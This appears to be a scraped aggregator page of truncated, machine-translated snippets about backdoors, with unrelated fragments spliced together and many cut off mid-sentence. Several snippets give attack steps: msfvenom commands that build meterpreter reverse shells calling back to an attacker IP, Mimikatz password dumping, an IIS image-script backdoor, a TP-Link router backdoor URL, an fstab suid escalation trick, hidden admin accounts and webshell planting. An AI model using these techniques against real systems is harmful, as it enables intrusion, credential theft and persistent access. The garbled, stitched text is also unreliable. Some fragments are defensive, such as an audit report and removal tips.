Continuous back DoorGet a session FirstGenerate a continuous backdoor on the target hostSet Listening parametersStart listeningRestarting the host being attackedGets to session when an attacker is startedUse of MimikatzMimikatz is a tool developed by Russian organizationsLoad MimikatzHelp View commandsMSV get user name and hashWdigest getting clear-text password information in memoryKerberos Gets the plaintext password information in memoryView HashVi
The backdoor in this chapter has the followingWindows--Using the module "WINDOWS/METERPRETER/REVERSE_TCP"Command: msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.2.146 lport=44444 X >test.exeRefer to "09-metasploit's My Remote control software"Linux--Using the module "LINUX/X86/METERPRETER/SHELL_RVERSE_TCP"Command: msfvenom-p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.146 lport=1234 X >textReference article: http://xiao106347.blog.163.
Author: tombkeeper PGN Source: www.loveling.net/Hacker Base
The content of this article is how to build a backdoor using some of the features of IIS itself. This, of course, is primarily a "Know Your enemy" document for network administrators and network security workers, and the authors hope this article will help to check and clear the back door, without encouraging or endorsing the use of the techniques of this article for illegal activities.
Fir
application mappings to IIS after the invasion, and parse the extensions for pictures like. gif with Asp.dll (or Php.exe), and change the application protection for this virtual directory to low so that our backdoor will have system privileges. When we inject the image script to execute the cmd command, we can post the command we want to execute via the local form, and of course it can be get: code/uploadfiles/newsphoto/xx.coma1.gif?cmd=dir This appr
ISEC released the first-stage security audit report of the encryption software TrueCrypt. The preliminary analysis showed that TrueCrypt did not find evidence of backdoor or other malicious code intentionally added.
TrueCrypt is a popular encryption software, but has never been audited. After the exposure of NSA large-scale monitoring activities, security researchers initiated a complete security audit of TrueCrypt, which iSEC is responsible. Resea
recorded in/boot/System. map-'uname-R', which indicates the address of sys_call_table.
Cat/boot/System. map-'uname-R' | grep sys_call
unsigned *sys_call_table = (unsigned *) ;
The basic usage is
1. Start a process at will. Here we take the deamon background sign-In program as an example./L133, and the record pid is 13165.
liet@kali:~/code/c/study/socket/http/bbs_sign$ ./~/code/c/study/socket/http/bbs_sign$ aux | ? S : : ./ pts/ S+ : : ~/code/c/study/soc
Release date: 2013-03-11Updated on: 2013-03-13
Affected Systems:TP-LINK TL-WDR4300 TL-WR743ND (v1.2)TP-LINK TL-WDR4300 TL-WDR4300Description:--------------------------------------------------------------------------------TP-Link is a popular wireless router.Some wireless router devices of TP-Link have backdoors. By sending specific requests, you can completely control the devices.Send the "http: // 192.168.0.1/userRpmNatDebugRpm26525557/start_art.html" request to the device (assuming the IP add
Each process has a PID, and each PID has a corresponding directory under the/proc Directory, which is the implementation of the Linux (current kernel 2.6) system. Generally, backdoor programs cannot be found in ps and other process viewing tools, because these commonly used tools and even system libraries are basically passive after the system is infiltrated (a large number of rootkits are circulating on the Internet. If it is a kernel-level Trojan, t
@ localdomain etc] #
This will be retained. This method is compared to XXOXX, and it is estimated that few administrators know it. Demo using methods
[Xiaoyu @ localdomain ~] $ Ls-l/etc/fstab-Rw-1 root 456/etc/fstab[Xiaoyu @ localdomain ~] $ Echo test/mnt ext2 user, suid, exec, loop 0 0>/etc/fstab
Then, upload a file from the local machine to the target machine. Here we name it test.
[Xiaoyu @ localdomain tmp] $ ls-l test-Rw-r -- 1 xiaoyu 102400 2008-04-20 test[Xiaoyu @ localdomain tmp] $ mount
password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.
Create and delete hidden administrator accountsWhen hackers intrude into a host, they will try to protect their "labor results". Therefore, they will leave various backdoors on the zombie to control the zombie for a long time, the most commonly used is the account hiding technology. Create a hidden account on the bot
June 13, November 2: Today, users are reminded to pay special attention to the following viruses: "gray pigeon variant 333312" (Win32.Hack. huigezi.33333312) and "netmask disguised hacker" (Win32.PSWTroj. WoW. dg.73728 ).
"Gray pigeon variant 333312" (Win32.Hack. Huigezi.333312) is a gray pigeon variant.
"Hacker disguised as a hacker" (Win32.PSWTroj. WoW. dg.73728) is a hacker.
I. "grey pigeon variant 333312" (Win32.Hack. Huigezi.333312) Threat Level: Medium
Virus features: After a virus is
See this first article first: http://www.bkjia.com/Article/201306/219719.htmlAnother student sent a horse tonight. Now asp's horses are basically the same. The detection principle modified by the same horse is roughly the same. Everyone has this opportunity: I will not send it out. Technically, I will certainly encrypt the backdoor before sending it out. Today, there is no encryption. According to the last detection process, we found the last place an
First:
It is relatively safe to hide our backdoors on the Administrator's background login interface.
Because the Administrator's portal is not frequently changed, as long as the login interface is there, our backdoor is there!
Of course, you can also insert other files flexibly, as long as this file is not often changed
1. Find the Administrator portal page from our SHELL
2. Edit it and write a piece of code at the end to copy the content to the clip
During the analysis of this TP-Link backdoor, I found other issues, which can be handy when analyzing other devices. finally the following path leads to remote root exec (useful for debugging purposes ). let's see.
The router allows for ftp connections. But the ftp session is somehow chrooted (ie. one can access only ftp root and USB shared directories ):
Standard ftp connection
Let's try a little trick now. After plugging a USB flash drive into the r
Although it can minimize the losses caused by Trojans and backdoors, the best way is to prevent them from happening.
1. Basic backdoor defense skills
First, you must disable unnecessary ports on the local machine or only allow access from specified ports. Second, you must use the Trojan-killing software to effectively prevent Trojans and backdoors. Third, you must learn how to operate processes, always pay attention to the system running status to see
Sogou browser vulnerabilities are backdoor every day after recruitment
I heard that sogou's input method is quite good.
1. The latest version is 5.3.6.16631 (the previous vulnerability version is 5.2.5.15987), but the previous vulnerability has not been fixed seriously.2. Although xss has been repaired, it can still be used without being repaired. For example, to load an external JS: http://x.com/poc/sogou5.2.jsHttp://v.sogou.com/vc/play/redirect.jsp?
Conscience sponsor: willing to help Raspberry Pi install Backdoor programs
Last Wednesday, the Raspberry Pi Foundation announced that it was willing to invest money to install a malware on its device.Information from emailRaspberry Pi was once referred to as "a card-type computer designed for student computer programming and Education". It only has a card-type computer of the credit card size, and its system is based on Linux, it was rapidly developi
Rootkit. win32.kernelbot, rootkit. win32.mnless, Trojan. win32.patched, backdoor. win32.rwx, etc. 1EndurerOriginal2008-07-141VersionA friend recently experienced a slow computer response. When using QQ, he always asked for activation. he suspected that he had hacked Trojans in the computer. Please help me with the repair.Download pe_xscan and run it. Use the task manager to stop the assumer.exe process, scan logs, and analyze the logs. The following s
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.